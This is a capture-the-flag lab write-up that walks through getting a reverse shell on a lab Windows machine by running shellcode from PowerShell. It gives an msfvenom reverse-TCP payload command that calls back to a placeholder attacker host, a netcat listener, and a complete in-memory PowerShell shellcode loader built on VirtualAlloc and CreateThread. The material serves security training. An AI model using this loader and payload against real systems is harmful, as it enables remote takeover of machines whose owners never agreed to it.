Day 8: Shellcodes of the world, unite!
Note:
Hey! Before you go through this writeup, try the task yourself first; if you get stuck, come back and check out the writeup.
PowerShell is a powerful task automation and configuration management tool, and when combined with malicious intent, it can be a double-edged sword. Today, we explore shellcode execution through PowerShell and the importance of securing your scripts.
Shellcode, typically a piece of machine code, is used to execute a payload on a compromised system. Understanding its creation and secure handling helps defenders anticipate and thwart potential attacks.
Q: What is the flag value once Glitch gets a reverse shell on the digital vault using port 4444? Note: The flag may take around a minute to appear in the C:\Users\glitch\Desktop directory. You can view the content of the flag by using the command type C:\Users\glitch\Desktop\flag.txt.
A: The pre-challenge instructions give us an idea of how to get the flag. The flag requires us to connect over port 4444 using a reverse shell, so we need to modify the msfvenom payload command accordingly (LPORT=4444).
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<AttackBox_IP> LPORT=4444 -f powershell
Following the challenge instructions, we set up a netcat listener on the AttackBox on port 4444:
nc -lnvp 4444
To create the reverse shell:
- In the Attack Box, open a PowerShell window, copy-paste the following and hit Enter.
# P/Invoke wrapper for kernel32!VirtualAlloc: allocates the memory that will hold the shellcode
$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;
public class VrtAlloc{
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
}
"@
Add-Type $VrtAlloc
# P/Invoke wrapper for kernel32!WaitForSingleObject: blocks until the shellcode thread exits
$WaitFor = @"
using System;
using System.Runtime.InteropServices;
public class WaitFor{
[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@
Add-Type $WaitFor
# P/Invoke wrapper for kernel32!CreateThread: starts a new thread at the shellcode's address
$CrtThread = @"
using System;
using System.Runtime.InteropServices;
public class CrtThread{
[DllImport("kernel32", CharSet=CharSet.Ansi)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
"@
Add-Type $CrtThread
- Copy-paste the payload produced by the msfvenom command next and hit Enter. The -f powershell output defines the $buf byte array that the following commands use.
- Copy-paste this command and hit Enter. It allocates a buffer of $buf.Length bytes with MEM_COMMIT|MEM_RESERVE (0x3000) and PAGE_EXECUTE_READWRITE (0x40); an RWX allocation like this is exactly what memory-scanning defenses look for.
[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
- Copy-paste this command and hit Enter. It copies the shellcode bytes from the managed array into the unmanaged buffer.
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
- Copy-paste this command and hit Enter. It starts a thread whose entry point is the buffer, which runs the shellcode.
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
- Copy-paste this command and hit Enter. It waits on the thread handle indefinitely (0xFFFFFFFF is INFINITE), keeping the PowerShell process alive while the reverse shell runs.
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
If your PowerShell window closes unexpectedly, it means that the reverse shell wasn't able to connect to the listener. Check your IP and port, and make sure that the listener is running on the Attacker Box.
- Once connected, navigate to the flag's directory
cd C:\Users\glitch\Desktop
- View the flag's contents (may take up to a minute to appear)
type flag.txt
Q: Are you interested in learning more about evasion? Take a look at the AV Evasion: Shellcode room.
A: No Answer needed!